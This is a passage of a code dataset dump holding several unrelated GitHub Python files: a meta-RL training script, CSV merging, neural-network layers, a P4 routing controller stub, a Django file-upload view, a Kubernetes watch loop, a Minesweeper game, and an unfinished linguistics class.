+{"seq_id":"31833250024","text":"# Main file to run for Meta-RL\n\nimport gym\nimport csv\nimport numpy as np\nimport argparse\n\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nimport particles\nimport particles.scenarios as scenarios\nfrom particles.environment import PersonalAgentEnv\n\nfrom models.actor_critic import ActorCritic\nfrom models.reinforce import Reinforce\nfrom models.metalearner import MetaLearner\n\nparser = argparse.ArgumentParser(description=None)\n\nparser.add_argument('-s', '--scenario', default='meta_simple.py',\n help='Path of the scenario Python script')\nparser.add_argument(\n '--model', default='Reinforce')\nparser.add_argument('--num_agents', default=1, type=int)\nparser.add_argument('-p', '--personalization', default='cluster',\n help='Personalization setup: \"variance\", \"remap\", \"cluster\", \"none\" supported')\nparser.add_argument('--load_agents', default='')\nparser.add_argument(\n '--save_agents', default='agents-0.json')\nparser.add_argument('--lr', default=1e-2, type=int,\n help='Learning rate')\nparser.add_argument('--gamma', type=float, default=0.99, metavar='G',\n help='discount factor (default: 0.99)')\nparser.add_argument('--inner_updates', type=int, default=10,\n help='Number of rollouts per batch')\nparser.add_argument('-d', '--debug', action='store_true',\n help='Print for debugging')\nparser.add_argument('--specific_agents', default='', # Want to load the designated training agents here\n help='Only load specific agent(s)')\nparser.add_argument('--eval_agents', default='', # Want to load the designated evaluation agents here\n help='Load agent type(s) for evaluation')\nparser.add_argument('-e', '--episode_len', default=100,\n type=int, help='Number of timesteps per episode')\nparser.add_argument('-ne', '--num_episodes', default=500,\n type=int, help='How many episodes to run')\nparser.add_argument('-r', '--render', action='store_true',\n help='Render gridworld window')\nparser.add_argument('--seed', default=42, type=int,\n help='Randomization seed')\nparser.add_argument('--log_interval', default=1, type=int,\n help='Logging rate')\nparser.add_argument('--save_results', default='./results/results.csv')\nparser.add_argument('--save_model', default='./trained_models/model.pt')\nparser.add_argument('--k', default=10, type=int,\n help='Number of shots allowed')\nparser.add_argument('--batch_size', default=10, type=int,\n help='Batch size during regular updates')\nparser.add_argument('--num_iters', default=10, type=int,\n help='Number of meta-iterations')\nparser.add_argument('--num_eval_iters', default=100, type=int,\n help='Number of evaluation iterations')\nparser.add_argument('--optimizer', default='Adam')\nparser.add_argument('-ro', '--replace_optimizer', action='store_true',\n help='If true, replace optimizer when loading model')\nargs = parser.parse_args()\n\n# Need to specify support models and agent configuration\nassert args.specific_agents != ''\nassert args.eval_agents != ''\nassert args.load_agents != ''\n\nload_agents = './particles/configs/' + args.load_agents + '.json'\nsupport_agents = args.specific_agents.split(' ')\n\nif args.model == 'ActorCritic':\n model = ActorCritic\nelif args.model == 'Reinforce':\n model = Reinforce\nelse:\n raise NotImplementedError\n\n# Predefine the observation and action spaces\nmetalearner = MetaLearner(model, 2, 5, K=10, num_iters=50,\n initialize_size=len(support_agents), lr=args.lr)\nmetalearner.episode_len = args.episode_len\n\n# META-TRAINING #\n# Pick a random subset to train?\nnp.random.seed(args.seed)\nsupport_agents = np.random.choice(\n support_agents, 6) # pick 6 to train randomly\n\nfor agent in support_agents: # Train pre-trained models first\n scenario = scenarios.load(args.scenario).Scenario(\n kind=args.personalization, num_agents=args.num_agents, seed=args.seed,\n load_agents=load_agents, specific_agents=agent)\n\n scenario.sample_task = True\n\n world = scenario.make_world()\n world.episode_len = args.episode_len\n env = PersonalAgentEnv(world, scenario.reset_world, scenario.reward,\n scenario.observation, info_callback=None,\n done_callback=scenario.done, shared_viewer=True)\n env.discrete_action_input = True\n env.seed(args.seed)\n\n metalearner.env = env\n\n # Create new policy for updating\n metalearner.current_policy = metalearner.policy(\n 0, metalearner.obs_shape, metalearner.action_shape)\n\n optimizer = optim.Adam(metalearner.current_policy.parameters(), lr=args.lr)\n metalearner.optimizer = optimizer\n\n # For every training iteration, save trajectory and get updates\n for n in range(args.num_iters):\n metalearner.train(args.k, n + 1) # +1 because save after an update\n\n scenario.sample_task = True # Now change the entity type - doesn't actually matter\n\n# Model should have lists of trajectories and policies now, indexed by training iteration\n# total_iters = np.array(range(args.num_iters)) + 1\n# only get first and last updates?\nmetalearner.calculate_distances(iterations=[1, args.num_iters])\n# Initially have these. Should we calculate divergences between all pretrained models?\n# After doing that, can see which policies are close are far, and also sort of bin them together in an association list\n# Then after doing this, during evaluation, we want to calculate again given some new trajectory\n\n# EVALUATION\neval_agents = args.eval_agents.split(' ')\n\nmeta_info = [['Timestep', 'Episode', 'Episode_Reward', 'Eval_Agent']]\ninfo = [['Timestep', 'Episode', 'State_x_pos', 'State_y_pos',\n 'Action', 'Relative Reward', 'Episode_Reward', 'Eval_Agent']]\n\nfor agent in eval_agents:\n scenario = scenarios.load('simple.py').Scenario(\n kind=args.personalization, num_agents=args.num_agents, seed=args.seed,\n load_agents=load_agents, specific_agents=agent)\n # create world\n world = scenario.make_world()\n world.episode_len = args.episode_len\n\n env = PersonalAgentEnv(world, scenario.reset_world, scenario.reward,\n scenario.observation, info_callback=None,\n done_callback=scenario.done, shared_viewer=True)\n env.discrete_action_input = True\n env.seed(args.seed)\n\n if args.render:\n env.render()\n\n obs_n = env.reset()\n running_reward = -1.0\n\n total_timesteps = 0\n episode_ix = 0\n\n metalearner.env = env\n\n # num_episodes = int(args.num_episodes / args.k)\n\n for n in range(args.num_eval_iters): # 100? Number of updates\n if n == 0:\n policy = model(0, 2, 5) # Initiate new policy\n optimizer = optim.Adam(policy.parameters(), lr=args.lr)\n for update in range(10):\n metalearner.sample(policy)\n metalearner.adapt(policy, optimizer, 10)\n trajectory, ep_reward = metalearner.sample(\n policy) # Get new trajectory and ep_reward\n total_timesteps += 10 * args.episode_len\n\n meta_info.append([total_timesteps, episode_ix, ep_reward, agent])\n\n episode_ix += 1\n\n policies = metalearner.get_updated_policies(\n 4, policy, trajectory, 1)\n rewards = [policy['reward'] for policy in policies]\n # Just pick highest reward policy for now\n policy_ix = np.array(rewards).argsort()[0]\n policy = policies[policy_ix]['policy']\n if args.replace_optimizer:\n optimizer = optim.Adam(policy.parameters(), lr=args.lr)\n else:\n optimizer = policies[policy_ix]['optimizer']\n\n env.reset()\n else:\n # After this fast adaptation stage, revert to VPG\n for update in range(args.batch_size):\n t = 0\n while t < args.episode_len:\n ep_reward = 0\n act_n = []\n act_n.append(policy.action(obs_n[0]))\n # step environment\n obs_n, reward_n, done_n, _ = env.step(act_n)\n if args.debug:\n print('OBSERVATIONS: {}'.format(obs_n))\n # render all agent views\n if args.render:\n env.render()\n # display rewards\n if args.debug:\n for agent in env.world.agents:\n print(agent.name + \" reward: %0.3f\" %\n env._get_reward(agent))\n policy.rewards.append(reward_n[0])\n ep_reward += reward_n[0]\n t += 1\n total_timesteps += 1\n\n try:\n relative_reward = policy.rewards[-1] - \\\n policy.rewards[-2]\n except:\n relative_reward = 0\n\n if total_timesteps % args.log_interval == 0:\n info.append([total_timesteps, episode_ix, obs_n[0][0], obs_n[0][1],\n act_n[0], relative_reward, ep_reward, agent])\n if done_n[0] is True:\n continue\n policy.finish_episode(optimizer, args.gamma)\n episode_ix += 1\n if total_timesteps % args.log_interval == 0:\n print('Episode {}\\tLast reward: {:.3f}\\tAverage reward: {:.2f}'.format(\n episode_ix, ep_reward, running_reward))\n env.reset()\n # info.append([total_timesteps, n, obs_n[0][0], obs_n[0]\n # [1], act_n[0], relative_reward, ep_reward])\n # running_reward = 0.05 * ep_reward + (1 - 0.05) * running_reward\n policy.update(optimizer, args.batch_size)\n env.reset()\n\n # # Save model and results\n # print('Saving model...')\n # torch.save(policies[0].state_dict(), args.save_model)\n\nwith open(args.save_results, 'w') as f:\n writer = csv.writer(f)\n writer.writerows(info)\n\nmeta_results_fname = '{}-meta.csv'.format(args.save_results.split('.csv')[0])\n\nwith open(meta_results_fname, 'w') as f:\n writer = csv.writer(f)\n writer.writerows(meta_info)\n\n\n# python meta_main.py --num_iters 10 --k 10 --seed 1 --load_agents 'agents-clustered-p' --num_eval_iters 10 --model 'Reinforce' --log_interval 1 --episode_len 100 --optimizer 'Adam' --specific_agents 'PersonalAgent-0 PersonalAgent-1 PersonalAgent-3 PersonalAgent-8 PersonalAgent-9 PersonalAgent-10 PersonalAgent-13 PersonalAgent-15 PersonalAgent-16 PersonalAgent-18 PersonalAgent-21 PersonalAgent-22' --eval_agents 'PersonalAgent-2 PersonalAgent-4 PersonalAgent-5 PersonalAgent-6 PersonalAgent-7 PersonalAgent-11 PersonalAgent-12 PersonalAgent-14 PersonalAgent-17 PersonalAgent-19 PersonalAgent-20 PersonalAgent-23'\n\n\n\n","repo_name":"mzio/personalized-particle-env","sub_path":"meta_main.py","file_name":"meta_main.py","file_ext":"py","file_size_in_byte":11165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"3060619811","text":"import csv\r\n\r\nwith open(\"movies.csv\",encoding=\"utf8\") as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n allmovies = data[1:]\r\n headers = data[0]\r\n\r\nheaders.append(\"poster_link\")\r\nwith open(\"final.csv\",\"a+\") as f:\r\n writer = csv.writer(f)\r\n writer.writerow(headers)\r\n\r\nwith open(\"movie_links.csv\",encoding=\"utf8\") as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n allmovielinks = data[1:]\r\n\r\nfor i in allmovies:\r\n posterfound = any(i[0] in j for j in allmovielinks)\r\n if posterfound:\r\n for movielinkitem in allmovielinks:\r\n if i[0] == movielinkitem[0]:\r\n i.append(movielinkitem[1])\r\n if len(i) == 20:\r\n with open(\"final.csv\",\"a+\",encoding=\"utf8\") as f:\r\n csvwriter = csv.writer(f)\r\n csvwriter.writerow(i) \r\n","repo_name":"Rishiidc/movierec","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"40776816684","text":"import sys\nimport graphviz_managed.logging\ngraphviz_managed.logging.setup()\n\n# ---8<--- START SAMPLE ---8<---\n\nfrom graphviz_managed import Graph\ngraph = Graph(label='Highlight graph entry points', rankdir='LR')\nnode = graph.node\n\n# Define a larger graph\na = node(label='a')\nb = node(label='b')\nc = node(label='c')\nd = node(label='d')\ne = node(label='e')\nf = node(label='f')\na >> [b, e]\nc >> [b, e]\nd >> a\ne >> f\nf >> [b, a]\n\n# Highlight nodes with no incoming edges\nfrom collections import defaultdict\nincoming_count = defaultdict(int)\nfor edge in graph.edges:\n incoming_count[edge.end] += 1\nfor node in graph.nodes:\n if incoming_count[node] == 0:\n node.attrs.color = 'darkgreen'\n node.attrs.fontcolor = 'darkgreen'\n node.attrs.style = 'filled'\n node.attrs.fillcolor = 'beige'\n\n# ---8<--- END SAMPLE ---8<---\n\n# Save output\ngraph.render(sys.argv[1])\n","repo_name":"sio/graphviz-managed","sub_path":"samples/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"42153534395","text":"import mindspore.nn as nn\nfrom mindspore.common.initializer import TruncatedNormal\n\n\nclass Conv2dLayer(nn.Cell):\n \"\"\"\n Define the convolutional layer in the discriminator, including convolution, activation operations.\n\n Args:\n in_channels(int): spatial dimension of input tensor.\n out_channels(int): spatial dimension of output tensor.\n kernel_size(int): the height and width of convolution kernel.\n stride(int): the moving step of convolution kernel.\n dilation(int): dilation size of convolution kernel.\n\n Return:\n x: Output of the network layer.\n \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, stride, dilation):\n super(Conv2dLayer, self).__init__()\n self.activation = nn.LeakyReLU(0.2)\n self.conv2d = nn.Conv2d(in_channels, out_channels, kernel_size, stride, pad_mode='same', dilation=dilation,\n has_bias=True, weight_init=TruncatedNormal(0.05))\n\n def construct(self, x):\n x = self.conv2d(x)\n x = self.activation(x)\n return x\n\n\nclass DepthSeparableConv(nn.Cell):\n \"\"\"\n Building gate branch of depth-separable LWGC.\n\n Args:\n in_channel(int): spatial dimension of input tensor.\n out_channel(int): spatial dimension of output tensor.\n stride(int): the moving step of convolution kernel.\n dilation(int): dilation size of convolution kernel.\n\n Return:\n x: Output of the network layer.\n \"\"\"\n\n def __init__(self, in_channel, out_channel, stride, dilation):\n super(DepthSeparableConv, self).__init__()\n self.ds_conv = nn.Conv2d(in_channels=in_channel, out_channels=out_channel, kernel_size=1, stride=stride,\n pad_mode='same', padding=0, dilation=dilation, group=1, has_bias=True,\n weight_init=TruncatedNormal(0.05))\n\n def construct(self, x):\n x = self.ds_conv(x)\n return x\n\n\nclass ScConv(nn.Cell):\n \"\"\"\n Building gate branch of single-channel LWGC.\n\n Args:\n in_channel(int): spatial dimension of input tensor.\n kernel_size(int): the height and width of convolution kernel.\n stride(int): the moving step of convolution kernel.\n padding(int): the number of padding on the height and width directions of the input.\n dilation(int): dilation size of convolution kernel.\n\n Return:\n x: Output of the network layer.\n \"\"\"\n\n def __init__(self, in_channel, kernel_size, stride, padding, dilation):\n super(ScConv, self).__init__()\n self.single_channel_conv = nn.Conv2d(in_channels=in_channel, out_channels=1, kernel_size=kernel_size,\n stride=stride, pad_mode='same', padding=padding, dilation=dilation,\n group=1, has_bias=True, weight_init=TruncatedNormal(0.05))\n\n def construct(self, x):\n x = self.single_channel_conv(x)\n return x\n\n\nclass GatedConv2d(nn.Cell):\n \"\"\"\n Implement complete depth-separable and single-channel LWGC operation.\n\n Args:\n in_channel(int): spatial dimension of input tensor.\n out_channel(int): spatial dimension of output tensor.\n kernel_size(int): the height and width of convolution kernel.\n stride(int): the moving step of convolution kernel.\n dilation(int): dilation size of convolution kernel.\n sc(bool): if True, the network is single-channel LWGC; otherwise, it is depth-separable LWGC operation.\n\n Return:\n x: Output of the network layer.\n \"\"\"\n\n def __init__(self, in_channel, out_channel, kernel_size, stride, dilation, sc=False):\n super(GatedConv2d, self).__init__()\n self.activation = nn.ELU(alpha=1.0)\n if sc:\n self.conv2d = nn.Conv2d(in_channel, out_channel, kernel_size, stride, pad_mode='same', padding=0,\n dilation=dilation, has_bias=True, weight_init=TruncatedNormal(0.05))\n self.gate_factor = ScConv(in_channel, kernel_size, stride, 0, dilation)\n else:\n self.conv2d = nn.Conv2d(in_channel, out_channel, kernel_size, stride, pad_mode='same', padding=0,\n dilation=dilation, has_bias=True, weight_init=TruncatedNormal(0.05))\n self.gate_factor = DepthSeparableConv(in_channel, out_channel, stride, dilation)\n self.sigmoid = nn.Sigmoid()\n\n def construct(self, x):\n gc_f = self.conv2d(x)\n gc_g = self.gate_factor(x)\n x = self.sigmoid(gc_g) * self.activation(gc_f)\n return x\n\n\nclass TransposeGatedConv2d(nn.Cell):\n \"\"\"\n Add upsampling operation to gated convolution.\n\n Args:\n in_channel(int): spatial dimension of input tensor.\n out_channel(int): spatial dimension of output tensor.\n kernel_size(int): the height and width of convolution kernel.\n stride(int): the moving step of convolution kernel.\n dilation(int): dilation size of convolution kernel.\n sc(bool): if True, the network is single-channel LWGC; otherwise, it is depth-separable LWGC operation.\n scale_factor(int): the scale factor of new size of the tensor.\n\n Return:\n x: Output of the network layer.\n \"\"\"\n\n def __init__(self, in_channel, out_channel, kernel_size, stride, dilation=1, sc=False, scale_factor=2):\n super(TransposeGatedConv2d, self).__init__()\n self.scale_factor = scale_factor\n self.gate_conv2d = GatedConv2d(in_channel, out_channel, kernel_size, stride, dilation, sc)\n\n def construct(self, x):\n x = nn.ResizeBilinear()(x, scale_factor=self.scale_factor)\n x = self.gate_conv2d(x)\n return x\n","repo_name":"mindspore-courses/applications","sub_path":"CRA/src/models/network_module.py","file_name":"network_module.py","file_ext":"py","file_size_in_byte":5733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"74858684783","text":"from datetime import datetime\n\n\nRU_MONTH_VALUES = {\n 'Января': '01',\n 'Февраля': '02',\n 'Марта': '03',\n 'Апреля': '04',\n 'Мая': '05',\n 'Июня': '06',\n 'Июля': '07',\n 'Августа': '08',\n 'Сентября': '09',\n 'Октября': '10',\n 'Ноября': '11',\n 'Декабря': '12',\n}\n\n\ndef translate(date: str):\n for key in RU_MONTH_VALUES.keys():\n if key in date:\n date = date.replace(key, RU_MONTH_VALUES[key])\n return date\n\n\ndef transform(date: str):\n date = datetime.strptime(date, '%d %m %Y')\n return date\n","repo_name":"gagpa/metro_app","sub_path":"parser_news/serializers/date_translator.py","file_name":"date_translator.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"23096528145","text":"import os\nfrom p4utils.utils.helper import load_topo\nfrom p4utils.utils.sswitch_thrift_API import SimpleSwitchThriftAPI\nfrom p4utils.utils.sswitch_p4runtime_API import SimpleSwitchP4RuntimeAPI\n\nclass RoutingController(object):\n\n def __init__(self):\n\n if not os.path.exists('topology.json'):\n print('Could not find topology object!!!\\n')\n raise Exception\n\n self.topo = load_topo('topology.json')\n self.controllers = {}\n self.init()\n\n def init(self):\n self.connect_to_switches()\n self.reset_states()\n self.set_table_defaults()\n\n def reset_states(self):\n \"\"\"Resets registers, tables, etc.\n \"\"\"\n for p4rtswitch, controller in self.controllers.items():\n # Reset grpc server\n controller.reset_state()\n\n # Connect to thrift server\n thrift_port = self.topo.get_thrift_port(p4rtswitch)\n controller_thrift = SimpleSwitchThriftAPI(thrift_port)\n # Reset forwarding states\n controller_thrift.reset_state()\n\n def connect_to_switches(self):\n for p4rtswitch, data in self.topo.get_p4switches().items():\n device_id = self.topo.get_p4switch_id(p4rtswitch)\n grpc_port = self.topo.get_grpc_port(p4rtswitch)\n p4rt_path = data['p4rt_path']\n json_path = data['json_path']\n self.controllers[p4rtswitch] = SimpleSwitchP4RuntimeAPI(device_id, grpc_port,\n p4rt_path=p4rt_path,\n json_path=json_path)\n\n def set_table_defaults(self):\n for controller in self.controllers.values():\n controller.table_set_default(\"ipv4_lpm\", \"drop\", [])\n controller.table_set_default(\"ecmp_group_to_nhop\", \"drop\", [])\n\n def route(self):\n \"\"\"implement this function\"\"\"\n\n def main(self):\n self.route()\n\n\nif __name__ == \"__main__\":\n controller = RoutingController().main()\n","repo_name":"nsg-ethz/p4-learning","sub_path":"exercises/08-Simple_Routing/p4runtime/routing-controller.py","file_name":"routing-controller.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":458,"dataset":"github-code","pt":"91"}
+{"seq_id":"29544242866","text":"from threading import Event\n\nown_ip = None\n\nsession_token = None\n\nonline_users = {} \n'''list of online users on the network'''\n\nonline_contacts = {} \n'''list of trusted users on the network'''\n\ncontact_requests = {} \n'''list of contact requests received by the client'''\n\nout_contact_requests = {} \n'''list of pending contact requests sent by the client'''\n\nignore_bcast_port = [] \n'''list of ports to ignore when broadcasting'''\n\n_tcpserver = None \n'''TCP server object'''\n\nnetwork_ready = Event()\n\nstop_threads = Event()\n\n\nCERT = \"\"\nKEY = \"\"\n\nbcast_port = 1337 # temp port_manager(1377, 9900)\ntcp_listen = 9900 # temp port_manager(1377, 9900)\ntcp_port = 9900\n\n\n\n","repo_name":"DangSage/Python-Cryptography","sub_path":"src/nglobals.py","file_name":"nglobals.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28931832166","text":"# Create your views here.\nimport json\nimport os\nimport magic\n\nfrom django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.conf import settings\nfrom django.http import HttpResponseBadRequest, Http404, HttpResponse\nfrom django.contrib.auth.decorators import login_required\n\nfrom file_sharing.models import Folders, File, UserData\n\nMEDIA_ROOT = settings.MEDIA_ROOT\n\n@login_required\ndef home(request, folder=0):\n if folder==0:\n root_folder = Folders.objects.get(user_id=request.user, level=0)\n folders = Folders.objects.filter(parent=root_folder).all()\n files = File.objects.filter(folder_id=root_folder.id).all()\n else:\n folders = Folders.objects.filter(parent_id=folder).all()\n files = File.objects.filter(folder_id=folder).all()\n \n storage, create = UserData.objects.get_or_create(user=request.user)\n ssize = storage.storage_size\n sused = storage.storage_usage\n storage = (sused*100)/ssize\n\n \n return render_to_response('file_sharing/index.html',\n {'folders':folders,\n 'folder':folder,\n 'files': files,\n 'storage': storage,\n }\n )\n\ndef save_upload( uploaded, filename, raw_data ):\n try:\n from io import FileIO, BufferedWriter\n with BufferedWriter( FileIO( filename, \"wb\" ) ) as dest:\n\n if raw_data:\n foo = uploaded.read( 1024 )\n while foo:\n dest.write( foo )\n foo = uploaded.read( 1024 ) \n # if not raw, it was a form upload so read in the normal Django chunks fashion\n else:\n for c in uploaded.chunks( ):\n dest.write( c )\n return True\n except IOError:\n # could not open the file most likely\n return False\n\n@csrf_exempt\n@login_required\ndef upload(request):\n if request.method == \"POST\":\n if request.is_ajax( ):\n upload = request\n is_raw = True\n try:\n filename = request.GET[ 'qqfile' ]\n except KeyError: \n return HttpResponseBadRequest( \"AJAX request not valid\" )\n else:\n is_raw = False\n if len( request.FILES ) == 1:\n upload = request.FILES.values( )[ 0 ]\n else:\n raise Http404( \"Bad Upload\" )\n filename = upload.name\n \n original_filename = filename\n #filename = create_filename(filename)\n #filename = \"%s/file_sharing/temp/%s\" % (MEDIA_ROOT, filename)\n base_dir = \"%s/file_sharing\" % MEDIA_ROOT\n \n folder_get = int(request.GET['folder'])\n user = request.user.username\n if folder_get != 0:\n folder = Folders.objects.get(id=folder_get)\n folder = str(folder.name).lower()\n target = \"%s/%s\" % (user, folder)\n else:\n target = \"%s\" % (user)\n \n full_target = \"%s/%s\" % (base_dir, target)\n if not os.path.exists(full_target):\n os.makedirs(full_target)\n \n filename = \"%s/%s\" % (full_target, filename)\n # save the file\n success = save_upload( upload, filename, is_raw )\n if success:\n file = File()\n file.name = original_filename\n file.target = target\n file.user = request.user\n file.size = os.path.getsize(filename)\n file.file_type = magic.from_file(filename, mime=True)\n if folder_get == 0:\n root_folder = Folders.objects.get(user=request.user, level=0)\n file.folder_id = root_folder.id\n else:\n file.folder_id = folder_get\n file.save()\n \n ret_json = {'success':success,'file':original_filename}\n return HttpResponse( json.dumps( ret_json ) )\n\n","repo_name":"afghanistanyn/django-file-sharing","sub_path":"file_sharing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"382262132","text":"import asyncio\nimport logging\nfrom asyncio import Event, Lock, Task\nfrom asyncio.exceptions import CancelledError\nfrom typing import Any, Dict, Optional\n\nimport aiohttp\n\nfrom kube.channels.objects import OEvSender\nfrom kube.client import AsyncClient\nfrom kube.config import Context\nfrom kube.model.selector import ObjectSelector\n\n\nclass AsyncClusterLoop:\n def __init__(self, *, async_loop: Any, context: Context, logger=None) -> None:\n from kube.async_loop import AsyncLoop\n\n self.async_loop: AsyncLoop = async_loop\n self.context = context\n self.logger = logger or logging.getLogger(\"cluster_loop\")\n\n self.initialized_event = Event()\n self.client: Optional[AsyncClient] = None\n\n self.watches_lock = Lock()\n self.watches: Dict[ObjectSelector, Task] = {}\n\n async def wait_until_initialized(self):\n await self.initialized_event.wait()\n\n async def get_client(self) -> AsyncClient:\n if self.client is None:\n raise RuntimeError(\"Have no client yet\")\n\n return self.client\n\n async def start_watch(\n self, selector: ObjectSelector, oev_sender: OEvSender\n ) -> None:\n assert self.client is not None # help mypy\n\n loop = self.async_loop.get_loop()\n coro = self.client.watch_objects(selector=selector, oev_sender=oev_sender)\n task = loop.create_task(coro)\n\n async with self.watches_lock:\n self.watches[selector] = task\n\n async def stop_watch(self, selector: ObjectSelector) -> None:\n async with self.watches_lock:\n task = self.watches.pop(selector, None)\n\n if task is None:\n raise RuntimeError(\"No such watch for selector %r\" % selector)\n\n try:\n task.cancel()\n except CancelledError:\n pass\n\n async def detect_stopped_watches(self):\n async with self.watches_lock:\n for selector, task in self.watches.items():\n if not task.done():\n continue\n\n exc = task.exception()\n if exc is not None:\n self.logger.error(\n \"Watch with selector %r errored out: %r\", selector, exc\n )\n return\n\n # okay, it didn't crash but... it exited for some reason?\n self.logger.warn(\n \"Watch with selector %r completed prematurely\", selector\n )\n\n async def mainloop(self):\n async with aiohttp.ClientSession() as session:\n logger = logging.getLogger(\"client\")\n logger.setLevel(logging.INFO)\n\n self.client = AsyncClient(\n session=session, context=self.context, logger=logger\n )\n\n # once we have a client we announce we are ready for use\n self.initialized_event.set()\n\n while True:\n await self.detect_stopped_watches()\n await asyncio.sleep(1)\n","repo_name":"nearmap/kubefs","sub_path":"kube/cluster_loop.py","file_name":"cluster_loop.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"10931040722","text":"from tkinter import *\nimport settings\nimport utilities\nfrom cell import Cell\n\nroot = Tk()\n# Override the settings of the window\nroot.configure(bg = \"black\")\nroot.geometry(f'{settings.WIDTH}x{settings.HEIGHT}')\nroot.title(\"Minesweeper Game\")\nroot.resizable(False, False)\n\n# Create top frame\ntop_frame = Frame(\n root,\n bg = \"black\", #change to black\n width = settings.WIDTH,\n height = utilities.height_prct(25)\n)\ntop_frame.place(x = 0, y = 0)\n\ngame_title = Label(\n top_frame,\n bg='black',\n fg='white',\n text='Minesweeper Game',\n font = ('', 48)\n)\n\ngame_title.place(\n x = utilities.width_prct(25),\n y = 0\n)\n# Create left frame\nleft_frame = Frame(\n root,\n bg = \"black\",\n width = utilities.width_prct(25),\n height = utilities.height_prct(75)\n)\nleft_frame.place(x = 0, y = utilities.height_prct(25))\n\n# Create center frame\ncenter_frame = Frame(\n root,\n bg = \"black\",\n width = utilities.width_prct(75),\n height = utilities.height_prct(75)\n)\ncenter_frame.place(x = utilities.width_prct(25), y = utilities.height_prct(25))\n\n# Create game grid\nfor x in range(settings.GRID_SIZE):\n for y in range(settings.GRID_SIZE):\n c = Cell(x, y)\n c.create_btn_object(center_frame)\n c.cell_btn_object.grid(\n column = x,\n row = y\n )\n#Call label from Cell\nCell.create_cell_count_label(left_frame)\nCell.cell_count_label_object.place(x = 0, y = 0)\nCell.randomize_mines()\n#Run the window\nroot.mainloop()","repo_name":"fueled-by-matcha/minesweeper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"16198152268","text":"from uuid import uuid4\nimport collections\n\n# NOTE: what's called \"suprasegmental\" is actually meant to \"mark\" extra info around\n# a single sound that can be configured, toggled or changed independently of that\n# sound's internal value (see Phonetics for those features).\n\n# NOTE: WAIT! let's think about the construction\n# - count morae, including turning strings into morae\n# - TODO: build moraics class\n# - count syllables, including turning strings into syllables\n# - TODO: build syllabics class\n# - TODO: revamp this class\n# - store seg marker names mapped to mark symbols\n# - store mark symbols mapped to marked sounds\n# - store marked sounds mapped to marked letters\n# - alternatively map marks to marked letters\n# - store marking or contour data telling how to apply marks\n# - index to specific syllable, mora or sound\n# - handle changes given any kind of environment\n# - features list, CV abbrev, sound, mark, mora, syllable\n# - TODO: here list an example of each kind of change to work towards\n\nclass Suprasegmentals:\n # MARKS data?\n # {\n # mark: mark_id, # use to look up marked letters/symbols\n # prioritize: feature, # attempt to mark this feature first\n # mora: 0, # number of morae from fixed point\n # relative: word/feature, # from first/nearest occurrence, otherwise whole word\n # syllable: 0, # default to syll if given? \n # handedness: l/r, # count sylls/morae either left or right\n # direction: before/after # search direction if markable not in mora/syll \n # }\n def __init__(self, phonology):\n # renderable marks for sounds or whole syllables\n # NOTE: look up non-syll mark in diacritics (or separate out letters vs sounds?)\n self.marked_sounds = {} # mark: { syllable: False, before: True, mark: \"\" }\n # marks assigning diacritics to letters\n self.diacritics = {} # mark: { symbol: marked_symbol }\n\n # store phonology for checking syllable types\n self.phonology = phonology\n self.marked_words = {\n # word_id: [mark_ids]\n }\n\n # NOTE: code for allowing multiple marks per sound, multiple marks per syllable\n self.marks = {\n # mark_id: { data } # see info below\n # headword: {\n # 'syllables': [], # list of syllable-long string lists\n # 'syllable': 0, # target syllable containing marked sound\n # 'sound': 0 # target sound this mark applies to\n # 'mark': 'id', # pointer to the mark details\n # }\n }\n self.intonation = {\n # pitch_range: character pairs\n }\n self.stress = {\n # character: feature pairs\n }\n\n # associate word lookups with contours\n # then use contours when applying changes or checking environments\n # TODO: support contours with one mark per unique contour key\n # TODO: support marks with one char per marked sound\n # - when applying marks look for first syll char taking that mark\n # - also allow for syllable mark (but store whether before/after)\n self.contours = {}\n self.syllabifications = {}\n self.default_contours = {}\n\n # TODO: rethink pitch/tone/accent alongside default and custom contours below\n def shift_accent(self, sounds, syllables=0):\n return\n def raise_pitch(self, sounds, octaves=0.0):\n return\n def reshape_pitch(self, sounds, shape):\n return\n \n # TODO: work through all possibilities: features list, CV abbrev, sound, mark, mora\n def detect_environment_including_marks(self, whole, parts):\n assert isinstance(parts, list), f\"Expected detectable part in whole to be list not {parts}\"\n assert isinstance(whole, (list, str)), f\"Expected compared whole to be string or list not {whole}\"\n matching_parts = [] # TODO: paired info about type of match?\n for i, symbol in enumerate(whole):\n if matching_parts == len(parts):\n return True # or matching_parts list?\n did_match = True\n for j, part in enumerate(parts):\n if not did_match:\n matching_parts = []\n break\n compared_symbol = whole[i + j]\n # treat as features\n if set(compared_symbol).issubset(self.phonology.phonetics.features.keys()):\n if set(part).issubset(set(compared_symbol)):\n matching_parts.append(part)\n continue\n # treat as single feature or abbreviation\n if isinstance(symbol, str) and part == symbol:\n matching_parts.append(part)\n continue\n # treat as single sound\n if self.phonology.has_sound(symbol):\n matching_parts.append(part)\n continue\n # treat as mark\n if 